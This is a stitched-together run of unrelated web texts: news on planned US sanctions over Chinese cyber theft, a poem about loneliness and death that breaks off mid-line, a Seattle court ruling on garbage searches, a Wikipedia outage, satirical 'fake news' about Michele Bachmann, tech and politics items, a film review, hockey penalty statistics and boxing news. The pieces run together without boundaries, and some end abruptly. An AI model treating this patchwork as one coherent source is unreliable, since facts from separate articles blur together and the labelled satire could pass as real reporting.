For the top stories in tech , follow us on Twitter at @ PCMag .
China 's Ambassador to the United States Cui Tiankai said Saturday that he believes the upcoming U.S. visit by China 's President Xi Jinping will be a success . When asked about reports of planned U.S. economic sanctions on Chinese companies and individuals involved in alleged cyber thefts from U.S. companies , and whether such sanctions would change the timetable for Xi 's visit this month , Cui said he hoped that “ nobody will do anything so nonconstructive , ” and that he hoped “ the U.S. side will make the smart choice , '' implying that economic sanctions would be the wrong choice .
Ambassador Cui was speaking to reporters on Saturday after a concert in Maryland to mark the 70th anniversary of victory in the People 's War of Resistance against Japanese Aggression , China Daily reports today .
Ambassador Cui further stated that both the U.S. and China are facing cyberattacks , but that “ China , as a developing nation , is much more a victim of ” them . He said that “ instead of moving towards conflict and confrontation , the U.S. and China have every reason to conduct more communications and cooperation in this regard. ” He predicted President Xi 's visit “ will produce fruitful results . .that will be a pleasant surprise when made public. ” He did not further elaborate on what that `` pleasant surprise '' might be .
It was reported last Thursday that the U.S. would announce this week after today 's Labor Day holiday economic sanctions against Chinese companies for cyber espionage on U.S. companies , rather than announce them later this month , as had been reported .
The sanctions planned this week are reported to not be in response to the attack on the U.S. Office of Personnel Management system . Those have been widely reported to be attributable to China . The U.S. failure to retaliate for that attack has been criticized . Stewart Baker , former 1st Assistant Secretary of Homeland Security for Policy , has written that `` even though the U.S. director of national intelligence long ago attributed the OPM hack to China , the National Security Council continues to dither about whether and how to retaliate . ''
Regarding economic sanctions against Chinese companies for cyberespionage on U.S. corporate interests , Robert Caruso , former U.S. Navy special security officer who has worked in security at the U.S. State and Defense departments , said in an email yesterday that “ globalization has moved most intellectual capital into the cloud , making it susceptible to theft and outright compromise . Far more aggressive steps should be taken to warn China of the negative consequences of engaging in cyberespionage and cybercrime. ” Jim Lewis , a cyber expert at the Center for Strategic & International Studies , told the Financial Times last week that “ the decision to punish China with sanctions reflected a new consensus within the Obama administration that previous measures , such as the indictment of Chinese military officers suspected of hacking , were ineffective . ”
Literature
Dead
Although my heart still beats
Boom-Boom
Boom-Boom
I am dead
People talk
But not to me
People walk
But not with me
People love
But not me
I stand there
As they walk by
They all just pass me
Or push me
Just to get by
Am I just an ugly little girl
Or am I truly invisible
The mask I wear
Is so happy
They think I 'm peppy
Overly so
So they laugh at me
Mock me
But at least then
They notice me
So I go on
Being their fool
So laugh
Laugh away
Just please
Look at me
Because even though
I smile and laugh
I really cry
Deep down inside
There is pain
In that heart of mine
Is it empty
Does it yearn for another
Yes
I want to be loved
But I 'm just a
Silly
Ugly
Spazzy
Little girl
If I disappear
Will anyone notice
Will anybody remember my name
If I die
Will anyone mourn for me
Will anyone miss me
The Cosmic Horn
Is an evil bastard
It makes me
Look away quick
It makes me
Lose my voice
It makes me
Babble and do stupid things
But nobody wants me
So it goes on
Causing me pain
That will never be sated
Until I
A Washington county judge has ruled that the city of Seattle 's warrantless searches of garbage violated the state 's constitution .
In her 14-page order , King County Judge Beth Andrus found in favor of eight Seattle residents whose trash was searched by sanitation workers . The workers were operating under a city ordinance that allowed them to inspect trash for possible violations of a city composting law . Violators could be fined $ 1 if they mistakenly put food waste into their regular garbage rather than organic waste bins .
The ruling turned on whether these inspections amounted to a privacy violation . The order , which was handed down last week , illustrates that states are able to grant more rights than those interpreted by the Supreme Court .
The Washington State Constitution declares : `` No person shall be disturbed in his private affairs , or his home invaded , without authority of law . '' Judge Andrus noted in her order that `` this language has been held to be qualitatively different from , and more protective than , the Fourth Amendment . '' By contrast , a 1988 Supreme Court decision , California v. Greenwood , ruled that a similar search of abandoned garbage did not violate the Fourth Amendment .
As she concluded :
This Court does not find that the City 's ban on the disposal of food waste and compostable paper in residential garbage cans is unlawful . The City persuasively argues that it has the police power to take steps to reduce the quantity of compostable material being disposed in landfills and that the ban is a reasonable regulation promoting public safety , health , and welfare . The Plaintiffs do not challenge these contentions . The only claim Plaintiffs raise is whether the City 's chosen method of enforcement , codified in [ Seattle Municipal Code ] 21.36.083 ( B ) ( 2 ) ( b ) and ( c ) , and [ Seattle Public Utilities ] Director 's Rule SW 402.1 ( B ) ( 1 ) - ( 3 ) , violates residents ' privacy rights by authorizing warrantless searches of their garbage . This ruling does not prohibit the City from banning food waste and compostable paper in SPU-provided garbage cans . It merely renders invalid the provisions of the ordinance and rule that authorize a warrantless search of residents ' garbage cans when there is no applicable exception to the warrant requirement , such as the existence of prohibited items in plain view .
In a statement , Ethan Blevins , an attorney with the Pacific Legal Foundation , applauded the ruling .
`` By authorizing garbage collectors to pry through people 's garbage without a warrant , the city has promoted a policy of massive and persistent snooping , '' he said . `` That 's not just wrong as a matter of policy , as the judge has correctly ruled , it is wrong as a matter of law . ''
This ruling is only binding within the state and can be appealed all the way up to the Washington Supreme Court .
In a statement , the City of Seattle wrote : `` We are pleased that the court 's ruling recognizes the City 's ability to regulate what goes into trash cans to address conservation and safety needs . ‘ Plain view ' monitoring for dangerous items is vital to protecting worker and public safety . This was the most important issue at stake in this case . ''
Andy Ryan , a City of Seattle spokesman , told Ars that the city did not plan to appeal the ruling .
Visitors to the Wikipedia website are greeted with a DNS failure notification . A spokesman for the website said access to English-language pages should be restored within the hour , by about 7pm UK time .
The reasons for the outage are unclear . Wikipedia used its Twitter feed to direct web users to a blog post explaining the technical problems , but that link also returned a DNS failure . However , the title of the blog post – `` Global outage , cooling failure and dns '' – can be seen in the address bar , and hints that a server cooling issue may be to blame for the site going down .
Several high-profile websites have fallen foul of overheating servers in recent years , including Last.fm 's London servers . Last May , the music-streaming site issued a statement saying that `` datacentre temperature issues '' beyond its control had caused the site to go offline .
Twitter users were among the first to notice the Wikipedia outage . Among the most amusing tweets was one from Funny or Die which read : `` Oh no ! Wikipedia is down ! [ citation needed ] '' . Other Twitter users joked that they could n't fact-check their articles before publishing them online .
Wikipedia was founded in 2001 by Jimmy Wales , an internet entrepreneur . The online encyclopedia , which allows anyone to create or edit entries , has been criticised in the past for containing false information .
Michele Bachmann Proposes 'Do n't Add , Do n't Spell '
Fake news by Andy Borowitz
MINNEAPOLIS — In her official tea party response to President Barack Obama 's State of the Union address , Rep. Michele Bachmann , R-Minn. , offered a bold new policy initiative she called “ Do n't Add , Do n't Spell. ” Bachmann called the proposal “ a reflection of core tea party values ” and said it would “ deliver the American people from the tyranny of arithmetic , spelling and punctuation . ”
In addition to “ Do n't Add , Do n't Spell , ” Bachmann suggested slashing the federal budget by eliminating nine of the first 10 amendments to the Constitution . “ I think you know which one I 'd keep , ” she chuckled , miming a Western gunslinger with her index fingers .
Bachmann 's odd onscreen appearance , in which she seemed to be staring off-camera for the duration of her speech , was initially blamed on “ a squirrel that got into the studio and distracted her , ” said one tea party official . But the Minnesota congresswoman offered her own explanation : “ I was looking off to one side because I was trying to read off Sarah Palin 's hand . ”
In Washington , House Speaker John Boehner held a press conference after the president 's speech to declare , “ This infernal week of civility is officially over. ” He added , “ The American people owe its representatives a huge debt of thanks . Tonight , each of us made the ultimate sacrifice any American can ever be called upon to make : sitting next to a person we despise . ”
Republicans Rehearsed Grouchy Facial Expressions for State of the Union
WASHINGTON — In preparation for what most political insiders agree was their most important performance of the year , congressional Republicans spent last week rehearsing their grouchiest facial expressions for Tuesday 's State of the Union address .
For seven grueling days , GOP congressmen were behind closed doors refining their best winces , grimaces and other sourpuss mannerisms under the tutelage of Speaker of the House John Boehner , R-Ohio . “ Looking like you 've just sucked on a lemon is harder than it seems , ” said Boehner . “ It does n't come naturally for everyone like it does for Mitch McConnell . ”
Boehner has been employing a “ method acting ” approach with his House colleagues , urging them to imagine “ the most unpleasant thing they can think of — like Keith Olbermann being back on TV . ”
But given the new vogue for “ civility ” that has swept Washington in recent weeks , Boehner is instructing House Republicans to restrain themselves from outbursts like that of Rep. Joe Wilson , R-S.C. , who famously shouted , “ You lie ! ” during President Obama 's congressional address in 2009 . “ If you feel an outburst coming on , ” Boehner told his colleagues , “ I ask that you instead limit yourself to a simple , tasteful hand gesture . ”
Boehner said that while he wanted his Republican members to look as grumpy as possible throughout Obama 's speech , “ I want them to show him the same respect we would show to any other foreign visitor to our shores . ”
Immediately following the president 's speech , Rep. Paul Ryan , R-Wis. , gave the official Republican response , followed by Michele Bachmann , R-Minn. , who gave the official moron response .
Award-winning humorist , television personality and film actor Andy Borowitz is author of the book “ The Republican Playbook . ”
Although Google has n't yet made any moves related to digital currencies , the search giant 's Director of Ideas Jared Cohen believes they are here to stay .
Speaking at SXSW – the annual interactive conference and festival held in Austin , Texas – Cohen said it is still unclear how digital currencies will develop , as they are a “ pretty new space ” , reports TechCrunch .
Jared said the future of digital currencies like bitcoin is clear :
“ It 's very obvious to all of us that cryptocurrencies are inevitable . ”
No plans… yet
While Google 's entry into the space would be a watershed moment for digital currencies , Jared 's statements should not be interpreted as Google 's endorsement of digital currencies .
Google Ideas is not exactly a skunkworks kind of organisation tasked with developing new projects . It is an interdisciplinary think tank based in New York City and has nothing to do with product development .
Cohen was tapped to head Google Ideas by Google Executive Chairman Eric Schmidt in 2010 and his statements do carry some weight , though .
Furthermore , although Google Ideas is not tied to Google 's core business , it is still a part of Google 's Business Operations and Strategy group and is not merely a philanthropic endeavour .
However , Cohen has a few ideas concerning cryptocurrencies that wo n't go down well with all members of the bitcoin community .
Value in regulation
Cohen sees a lot of value in bitcoin , but he also warns that lack of regulation is a challenge , saying :
“ There 's a danger to it not being regulated in some form . ”
Cohen added that there is an ongoing debate about bitcoin regulation that will undoubtedly continue as bitcoin “ plays out ” .
However , it should be noted that the bitcoin regulation debate has been going on for years , but it has yielded very little in the way of realistic proposals , let alone actual regulation .
New Napster ?
Cohen also cautioned that bitcoin may be just one model of a practical digital currency – likening it to Napster . We still do n't know how it will develop , he said .
Cohen appears to view bitcoin as a precursor to other digital currencies , but he does n't appear to be too certain about it . In the end , he merely repeats the question we are all too familiar with :
“ Is bitcoin the model , or the master of cryptocurrencies ? ”
If bitcoin is merely a model that can be expanded and built upon , alternative digital currencies could be created along similar lines , backed by various organisations , from financial institutions to corporations .
The altcoin craze proves there is plenty of room for development and innovation , but for big players altcoins are not nearly as interesting as bitcoin .
On the other hand , if bitcoin continues to expand unchallenged , any new digital currency hoping to replace it would face an uphill struggle , as bitcoin 's infrastructure grows and matures with time .
The window of opportunity is slowly closing .
Jared Cohen image via lev radin / Shutterstock.com
Qualcomm , with its 800 series chipsets , has ruled the smartphone market for quite some time now . With every flagship smartphone sporting a Snapdragon 800 series chipset , MediaTek had to come up with something .
That 's when the Helio X series happened . And now , in a bid to beat Qualcomm 's Snapdragon 835 , MediaTek Helio X30 has been showcased in all its glory . Even though it has n't found its way into any smartphone as of now , it does have some significant improvements over its predecessor , the Helio X20 .
MediaTek has started promoting the Helio X30 via a video presentation on its Weibo account . From what sources say , the MediaTek Helio X30 is the first and only chipset in the world that features a deca core processor built on the 10nm manufacturing process .
As compared to its predecessor , the Helio X20 , the X30 provides a 35 % bump up in performance and 50 % bump up in battery life , meaning , it can provide twice as much on time as the X20 . In addition to this , the X30 features a new CorePilot verification system , Imagiq 2.0 and lots more .
On the spec front , the Helio X30 features a deca core processor with three CPU clusters . It uses two Cortex-A73 cores clocked at 2.5GHz , four Cortex-A53 cores clocked at 2.2GHz and four Cortex-A35 cores clocked at 1.9GHz . On the memory front , it has support for up to 8GB LPDDR4X RAM with UFS2.1 for the secondary storage . On the GPU front , the X30 has the PowerVRXTP-MT4 GPU clocked at 800MHz . It has Cat 10 as the highest baseband .
Federal Appeals Court Hearing Set for September 15 on Secret Service Failure to Comply with Additional Presidential Travel Information Requests
Judicial Watch also released travel expenses related to President Trump 's travel totaling $ 4,082,427.71
( Washington , DC ) — Judicial Watch today announced it obtained travel records from the Secret Service in response to Freedom of Information Act ( FOIA ) lawsuit , bringing the known total of travel expenses for former President Barack Obama and his family to $ 105,662,975.27 . The latest records show President Trump 's travel expenses total slightly over $ 4 million .
Judicial Watch also announced that oral argument will be heard on Friday , September 15 , 2017 , in an additional FOIA lawsuit challenging the district court 's dismissal of Judicial Watch 's claim that Homeland Security has a history of violating FOIA 's requirements in the processing of Judicial Watch 's requests . ( Judicial Watch v. U.S. Department of Homeland Security ( No . 1:15-cv-01983 ) ) . Judicial Watch sought discovery in this case .
The hearing will be held before D.C . Circuit Judges Judith W. Rogers , Sri Srinivasan , and Cornelia T.L . Pillard :
Date : Friday , September 15 , 2017 Time : 9:30 A.M . Location : Courtroom 31 U.S. Court of Appeals for the District of Columbia Circuit 333 Constitution Ave NW Washington , DC 20001
The new Obama travel records obtained from the Secret Service were the result of a FOIA lawsuit filed in the U.S. District Court for the District of Columbia ( Judicial Watch v. U.S. Dept . of Homeland Security ( No . 1:17-cv-01007 ) ) . Judicial Watch 's lawsuit produced the following travel records showing a total of $ 3,696,266.56 for Obama travel :
Michelle Obama 's trip to Morocco cost $ 128,108.47 in hotels ; $ 88,725.60 in car rentals ; $ 1,476.07 in gas/oil and $ 972.22 in cell phone charges for a total of $ 244,218.01
Michelle Obama 's trip to Liberia cost $ 55,220 in hotels ; $ 44,000 in car rentals ; $ 2,500 in gas/oil and $ 1,000 in cell phone charges for a total of $ 107,890
Michelle Obama 's trip to Spain cost $ 79,764.49 in hotels ; $ 81,750.99 in car rentals and $ 4,547 in staff overtime pay for a total of $ 166,062.48
Obama 's November 2016 appearance at a Clinton campaign rally in Orlando , FL . cost $ 150,530.99 in hotels ; $ 103,526.96 in air/rail ; $ 11,588.76 in car rentals and $ 5,829 in equipment for a total of $ 271,467.71
Obama 's trip to Los Angeles in October 2016 , which included two fundraisers and an appearance on “ Jimmy Kimmel Live ” cost $ 127,822 in hotels ; $ 38,715 in air/rail ; $ 24,326 in equipment and $ 4,992.30 in car rentals for a total of $ 195,855
Michelle Obama 's October 2016 appearance at a Clinton campaign rally in North Carolina cost $ 13,206 in hotels ; $ 11,965 in air/rail and $ 1,331 in car rentals for a total of $ 26,502
The Obama family trip to Martha 's Vineyard in August 2016 cost $ 2,512,380.88 in hotels ; $ 89,586.82 in rental cars ; $ 53,234.69 in air/rail and $ 29,068.97 in miscellaneous expenditures for a total of $ 2,684,271.36
The Secret Service spent $ 1,862,230.74 on the Obamas ' final Christmas to Honolulu on the taxpayers ' dime : $ 1,765,583.12 on hotels and $ 96,647.62 on car rentals .
Added to the previously released costs , the known total of travel expenses for the Obamas is now $ 105,662,975.27
Separately , providing protection for Hillary Clinton between April 11 and May 6 , 2015 cost the Secret Service $ 23,323.14 in car rentals ; $ 294.057.65 in air/rail and $ 32,856.80 in travel vouchers for a total of $ 350,237.59 .
Judicial Watch also released travel expenses related to President Trump 's travel totaling $ 4,082,427.71 :
President Trump 's “ Thank You Tour ” between November 9 and December 12 , 2016 cost $ 330,260.86 in hotels ; $ 112,314 in air/rail ; $ 14,340 in equipment and $ 18,563.44 in car rentals for a total of $ 475,478.30
Trump visits to Mar-a-Lago between February 3 and March 27 , 2017 cost $ 1,474,726.03 in hotels ( including $ 19,760 at Mar-a-Lago ) , $ 284,581.63 on car rentals ; $ 1,791,768.33 on air/rail and $ 55,873.42 on supplies and services for a total of $ 3,606,949.41
Judicial Watch previously released records Air Force records showing Trump administration travel costs . The grand total for President Trump 's and Vice President Pence 's travel to date is $ 7,560,425.01 .
It cost the Secret Service an additional $ 95,187.58 to secure Trump Tower from November 9 through December 5 , 2016 .
Judicial Watch recently filed a FOIA lawsuit in the U.S. District Court for the District of Columbia , for the Secret Service travel expenditures for Trump family during April 2017 and Obama family between January 2009 and April 2017 ( Judicial Watch v. U.S. Dept . of Homeland Security ( No . 1:17-cv-01341 ) ) .
The suit was filed after the U.S. Air Force and the U.S. Secret Service failed to respond to FOIA requests filed in April and May 2017 seeking mission taskings , transportation costs , passenger manifests and security costs .
Judicial Watch seeks Air Force records for :
Trump 's trip to Mar-a-Lago between April 6 – 9 when he hosted Chinese President Xi Jinping
Obama 's trips to Chicago between January 20 , 2009 – January 20 , 2017
Trump 's trip to Mar-a-Lago between April 14 – 16 for Easter weekend with his family
Judicial Watch seeks Secret Service records for :
Trump and companions ' trip to Mar-a-Lago between April 6 – 9
Obama and companions ' trips to Chicago between January 20 , 2009 – January 20 , 2017
Obama and his companions ' trips to Chicago between January 20 , 2017 , and April 12 , 2017
Trump and companions ' trip to Mar-a-Lago April 14-16
“ It is troubling to see such massive amounts of money paid out for trips that appear to have minimal value to the public interest , ” said Judicial Watch President Tom Fitton . “ And it is frustrating to have file multiple FOIA lawsuits and engage in long-running court battles to get basic information about the costs of presidential travel . ”
# # #
In welcoming Xi Jinping to his Mar-a-Lago estate , Trump is signalling an intent to ignore human rights – and in the act may be ceding the mantle of global leadership to China
Donald Trump 's embrace of authoritarian tactics – and leaders – has dealt a body blow to activists struggling against repressive regimes across the globe , campaigners have warned , as the US president prepares to welcome China 's strongman ruler , Xi Jinping , to his Florida estate .
Warm welcome awaits Sisi as Trump rolls out red carpet for Egypt strongman Read more
Xi , the architect of a severe political clampdown at home , will be the second authoritarian leader Trump has hosted this week , following his controversial endorsement of Egyptian president Abdel Fattah el-Sisi at the White House on Monday .
“ We agree on so many things , ” the US president said of Sisi , who has been accused of jailing opponents , suppressing protests and overseeing a deadly military crackdown that left hundreds dead .
Xi , with whom Trump will hold two days of potentially thorny talks focused on trade and North Korea , also faces a litany of accusations over his human rights record . In the nearly five years since he took office , activists say China has been plunged into the harshest period of political repression since the days after the 1989 Tiananmen crackdown .
Campaigners and political opponents have urged Trump to speak out against Xi 's crackdown – which has targeted feminists , academics , publishers and top human rights lawyers – when the pair meet at Mar-a-Lago on Thursday .
“ It is unacceptable for President Xi to get a pass on human rights , ” Republican senator Marco Rubio said , pointing to more than 1,000 political and religious prisoners he said were languishing in Chinese jails .
However , Nicholas Bequelin , Amnesty International 's East Asia director , said Trump 's open contempt for the judiciary and support for policies “ in absolute and complete contradiction of human rights obligations under international law ” , such as his travel ban , meant the days when Washington could effectively lecture countries like China on human rights were over .
“ When a repressive government chooses to send someone to jail … they make political calculations about the benefits and costs of putting that person away , ” he said .
“ The fact that the US seems to be abandoning any kind of role in maintaining a consistent message on human rights and protesting human rights violations affects the calculations of these governments . They are just going to think there is no price to pay for political repression . So it will embolden them and at the end of the line human rights defenders in China will pay a heavier price … It is not going to be pretty . ”
A human rights activist , a secret prison and a tale from Xi Jinping 's new China Read more
Bequelin said that with Trump in the White House , Beijing would feel “ relief that there is no strong moral authority coming from the US anymore ” .
Margaret Huang , the executive director of Amnesty International USA , said that despite having been in office for less than 100 days , Trump could already boast “ a significantly dismal human rights record ” .
Trump 's silence over Xi 's sweeping crackdown and attempts to transform his own “ hateful ” campaign rhetoric into policy suggested he had decided to de-emphasise human rights issues both at home and abroad .
“ Human rights around the world are under increasing threat today and without bold , principled leadership we are heading in a very dangerous direction , ” Huang added .
Recent months have seen Xi attempt to contrast himself with the erratic commander-in-chief , stepping forwards as a champion of globalisation and the fight against climate change .
But Bequelin said he was troubled at how Trump 's apparent abdication of global leadership meant Xi would go into this week 's talks feted as the more responsible figure .
“ The optics of this meeting , frankly , is going to be that Xi Jinping is the adult in the room . But the next question is : what kind of adult ? ” Bequelin said .
“ He is the leader of an almost completely unaccountable political structure domestically ; a country where you have no rule of law , no elections , no religious or political freedoms , no free press and so on . It is wishful thinking to hope that greater Chinese leadership over global affairs would somehow turn out to be something different to what China is at home . ”
Despite widespread despondency over Trump 's unwillingness to champion human rights , victims of Xi 's crackdown are urging him to publicly challenge his guest .
Wang Qiaoling , the wife of jailed attorney Li Heping , said she hoped Trump would demand the release of prisoners such as her husband “ with no strings attached ” . “ If Trump knows what is happening in China , he will take action , ” she said .
Calls to publicly raise human rights issues are likely to fall on deaf ears , however . “ Those are the kind of things that I believe progress is made privately , ” White House press secretary Sean Spicer told reporters .
Last month , it emerged the US had declined to sign a letter criticising China over the alleged torture of human rights lawyers and activists , in a break with past practice .
The day Zhao Wei disappeared : how a young law graduate was caught in China 's human rights dragnet Read more
Ashley Townshend , a scholar at the University of Sydney 's United States Studies Centre , said it was possible Trump would feel “ some sense of camaraderie ” towards China 's authoritarian leader . “ There is something in Xi that Trump will find attractive . Trump respects powerful strongmen . He respects strength . ”
Bequelin said activists fighting repressive regimes would not throw in the towel simply because they could no longer count on the White House 's support .
“ When you live near a lake and you see the lake turn red [ you ] are not thinking about whether the great arc of the history of human rights is going in the right direction or not . You just want your kids not to be poisoned , ” he said .
“ [ But ] there is no doubt about it : abandoning human rights means abandoning human rights defenders . Abandoning people who play a positive role , and are very often the antibodies of the societies they live in , will make for a more unstable world in the medium and the long term . ”
Calling Red Tails : “ one of the worst movies I 've ever seen ” , might be a tad harsh . But if I rack my brain for a worse one , nothing springs immediately to mind .
Maybe my disappointment , that the treatment of such promising subject matter was so watered down , got the better of me ?
“ A high-flying action epic inspired by the heroic exploits of the first all African American aerial combat unit ” . The main theme apparently being : the Tuskegee Airmen fighting Nazis in the air and racism on the ground .
Let 's start with the Nazi element shall we ? When I was greeted with a shimmering LucasFilm logo at the outset , I cracked my knuckles , popped my first beer and mentally prepared myself for a cinematic treat . At least visually hey ? But whilst the flying scenes were special-effects-clever , ( nice one boy ) , they did n't actually make a whole lot of sense logically .
The skies are so littered with planes , American and German ( nobody else was in WWII apparently ) , that the dog fights defied belief . How can supposedly rookie-pilots weave in and out of their own comrades ' crafts whilst looking up , down , left , right and yacking away ( with face masks down ) ; no mid-air collisions , no friendly fire , no barrel-roll unwarranted ?
When the Red Tails shoot anything on the ground…and I mean anything…armored cars , trucks , trains , submarines ( OK , they 're in the water ) , planes ( at an airfield ) ; everything explodes spectacularly , as if it 's somehow been hollowed out and packed with explosives . ( If that 's historically accurate , why did our guys bother making bombs ? Bullets must have been cheaper and seemed to do the trick just fine . Perhaps they used a bomb when they wanted to take out a whole city in one fell swoop ) ?
Contrast this to Germans shooting American planes . Despite the close formation , only one plane is affected at a time ; still no mid-air collisions . Even then German bullets do n't seem to have the same explosive power . Fighter planes get gently riddled , so the pilots can take their last heroic breaths or limp back to base . As for bombers , they slowly disintegrate with wings folding off , engines detaching and propellers still turning .
Maybe , if LucasFilm and Industrial Light & Magic had stuck to science fiction films , someone here could 've produced results that were easier to swallow . ( After all , most of us have no idea what 's feasible in a fantasy world with technically advanced fighters ) . Bah ! Action side spoiled for me .
How about the racism side of the film . Again , this did n't seem historically accurate either . Plus , so middle of the road , I 'm surprised the cameraman was n't hit by a truck . For every racist incident , there seemed to be a patriotic counter-balance . ( Maybe we 're not all bad these days ; but I 'd guess back then the scales were heavily biased toward the nasty side ) .
The top brass thinks negroes are intellectually inferior and cowardly in the face of battle . ( Which begs the question : why spend money training them , only to give 'em crap planes and stick 'em in the middle of nowhere with no way to get return on investment ) ? But there 's obviously a good white guy thrown in , who does n't judge based on the color a man 's skin and fights to right this wrong .
On the base it 's all blacks . So no sign of racial tension there . The airmen could come and go as they pleased apparently ; so one of the main characters strikes up a romance with an Italian chick he 'd waved to from his plane . No racism with the locals either .
In fact , the only other incident is when the same officer goes into the ( white ) American Officers Club in town . The reception is cool , the word n * gger rears it 's ugly head and a fight breaks out . But even that 's offset , later in the flick , after they 've witnessed Red Tail courage…and the white guys give a patriotic salute and buy the Tuskegees a drink .
I 'm sure the true story of the Tuskegee airmen was riddled with sacrifice , racial struggles and patriotic endeavors , But this treatment was so wishy-washy it did n't reveal any of that . Even the military backdrop was laughable . Heroes are the guys who do what ever the f * ck they want ( brain optional ) ; nobody follows orders , because there are no consequences if they do n't . Even the Red Tails get their big chance , by taking over from a bunch of white pilots who do n't follow orders . ( Top brass 's solution to one squadron not carrying out their orders is obviously : let 's ask these other guys instead ) .
When I looked at the credits it confused me that Cuba Gooding Jr. got such high billing ? I mean I admire him as an actor , but he had no more scenes than anyone else . Plus , he did n't really get a chance to shine here . He kinda reminds me of Michael J Fox , in that he has an eternal baby face . Shoving a pipe in his mouth and casting him as a major did n't really make him seem any more mature or worldly-wise .
I also wondered why George Lucas would attach his name to this project as Executive Producer ? But then again , I guess he 's been side-tracked with Star Wars for the past 35 years . ( Star Wars 3D now . What 's next ; Star Wars scratch'n'sniff ) ?
All in all , not one I 'd recommend . In fact , if you see this one on the horizon , I 'd suggest you bank hard right and do a fly-by instead .
SaveSave
Since the hockey season has started back up and players are yet again being injured in fights , the debate about whether or not fighting should remain a part of hockey has reignited . Personally , I think fighting does have a place in hockey , just not the staged goon-on-goon violence that accounts for nearly half of all fights in the NHL . Two guys who have their emotions boil over in a tight game ? Sure . Two ham-fisted meatheads fighting on their first shift together for no reason whatsoever ? Pass .
In a poorly thought out and executed article over at the Predators blog On the Forecheck , the argument was attempted to be made that fighting has place because people still pay to watch the game with fighting in it , or something like that . Like I said , it 's not very well thought out . Anyway , I ventured into the comments , as I 'm prone to do , and my views on fighting were challenged with one of the most cliched responses regarding fighting 's place in hockey :
Fighting diminishes the use of the stick ( slash , spear , etc . ) skate ( slue foot , trip near the boards , etc . ) and the really dangerous employment of knees and elbows to solve disagreements on the ice .
There are few things I hate more than unsubstantiated claims spoken as if they were true . In fact , I think it 's for that reason that I got into blogging in the first place ; I wanted to see for myself what the actual truth of the matter was with regards to hockey and the various claims made about the game . So presented for the umpteenth time with this cliched response on Dirk Hoag 's blog , a lightbulb went off . Dirk , as you may know , compiles a list every year compiling the various penalty types called that season . This data I figured could be used to determine whether or not fighting deters any of that other rough stuff we 're constantly told it does .
What I figured is that if fighting deterred naughty behavior , then teams who fought more would draw less naughty behavior penalties . The penalties which I classified as `` non-obstruction penalties '' were : boarding , charging , checking from behind , clipping , cross-checking , elbowing , illegal check to the head , kneeing , roughing , slashing , and spearing . Pretty much the type of behavior that could get you an invitation to eat fists from the Colton Orr 's of the league if 'The Code ' is to be followed . ( Which it never is because there is no code . )
So I got in touch with Dirk and he gave me his data for the 2012-13 season . This is what I found :
Team Fighting Majors Penalty Total Boarding Charging Checking from behind Clipping Cross-checking Elbowing Illegal check to head Kneeing Roughing Slashing Spearing ANA 22 30 3 1 3 13 10 BOS 29 37 4 1 5 3 13 11 BUF 25 62 10 1 13 1 1 23 13 CAR 22 48 6 1 8 7 2 21 3 CBJ 33 52 11 1 7 1 1 21 10 CGY 21 40 3 2 7 2 16 10 CHI 16 35 7 5 1 16 6 COL 22 40 6 4 1 18 11 DAL 25 58 4 2 8 3 1 28 11 1 DET 14 47 9 1 9 4 1 15 8 EDM 13 54 16 10 17 11 FLA 20 38 3 1 5 2 15 12 L.A 18 62 11 1 10 3 24 13 MIN 23 53 6 2 9 1 1 28 6 MTL 23 75 8 1 1 17 2 33 13 N.J 16 59 7 3 6 3 1 25 14 NSH 21 38 1 6 20 11 NYI 17 44 2 1 8 22 11 NYR 17 34 7 1 6 2 10 8 OTT 23 61 9 2 7 2 27 14 PHI 30 70 7 2 11 5 33 12 PHX 15 54 4 1 10 3 1 19 16 PIT 20 65 5 2 12 1 28 17 S.J 18 53 7 1 12 20 13 STL 20 66 7 12 1 31 14 1 T.B 28 53 7 2 1 5 1 1 1 24 11 TOR 41 58 10 1 3 28 16 VAN 28 51 6 3 7 1 1 24 9 WPG 26 39 2 4 1 1 2 17 12 WSH 13 55 9 1 6 1 1 25 12 Total 659 1531 197 32 4 1 235 52 6 10 654 338 2 Average 22 51 6.6 1.1 0.1 0 7.8 1.7 0.2 0.3 21.8 11.3 0.1
Google doc spreadsheet can be found here .
If it looks like you do n't see a pattern , it 's because there is none . I ran a correlation study between fighting majors taken and non-obstruction penalties drawn and the r^2 value came back 0.0257 ; non-obstruction penalties actually increased with fighting majors though there 's hardly any correlation there .
( click to embiggen )
As Dirk puts the rest of his penalty data into spreadsheets , I 'll update mine to see if there 's any change at all ; though I highly doubt it .
This should be the proverbial nail in the coffin for talk about fighting serving as a deterrent for naughty behavior in hockey .
By Steve Kim
Coming off his tough twelve round decision win over unbeaten mandatory challenger Jesse Hart on September 22nd , WBO super middleweight titlist , Gilberto Ramirez is already looking at two fights - with Top Rank setting down two dates in the first half of the year .
Ramirez will first see action back in the United States in the first quarter of the year , then fight in Mexico for the first time since 2013 . Ten of Ramirez 's last eleven bouts have taken place in the United States , with eleventh going down in China .
Bob Arum , the founder of Top Rank , advised BoxingScene.com - `` He 's fighting February 3rd in the United States and then on May 12th he will fight in Mazatlan ( Mexico ) , we 'll put a real good card on underneath . ''
Ramirez ( 36-0 , 24 KO 's ) won his belt against Arthur Abraham in April of 2016 and has made two successful title defenses since then .
Following the win over Abraham , he was scheduled to fight in July of that year on HBO Pay-Per-View , but he was hampered for a bit with an injury to his right hand that kept him out of action for the remainder of the year after winning the title . He returned to the ring this past April , by winning a lopsided twelve round unanimous decision over durable Max Bursak before facing Hart .
As for how he 'll conclude 2018 , Ramirez may take the Manny Pacquiao route . Pacquiao traveled over to Australia in July to defend his WBO welterweight title against Jeff Horn in a stadium fight that drew 51,000 fans .
Arum said - `` There 's an up-and-coming super middleweight in Australia named ( Rohan ) Murdock ( 20-1 , 15 KOs ) , a good looking kid and maybe by that time he 'll be ready to fight Gilberto in Australia . ''
These bouts will be televised as part of Top Rank 's deal with ESPN .
Steve Kim is the news editor for BoxingScene.com .
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleackley
Aaron Bleakley
Aaron Bleackley
Aaron Bleackley
On a recent trip to Vancouver , I visited the Vancouver Hack Space ( which is awesome , by the way ) , just to see what local makers were doing . There I met a soft-spoken guy named Aaron Bleackley who introduced himself as the creator of `` the greatest spirographs in the world . '' Wait , what ? Is that really a thing ?
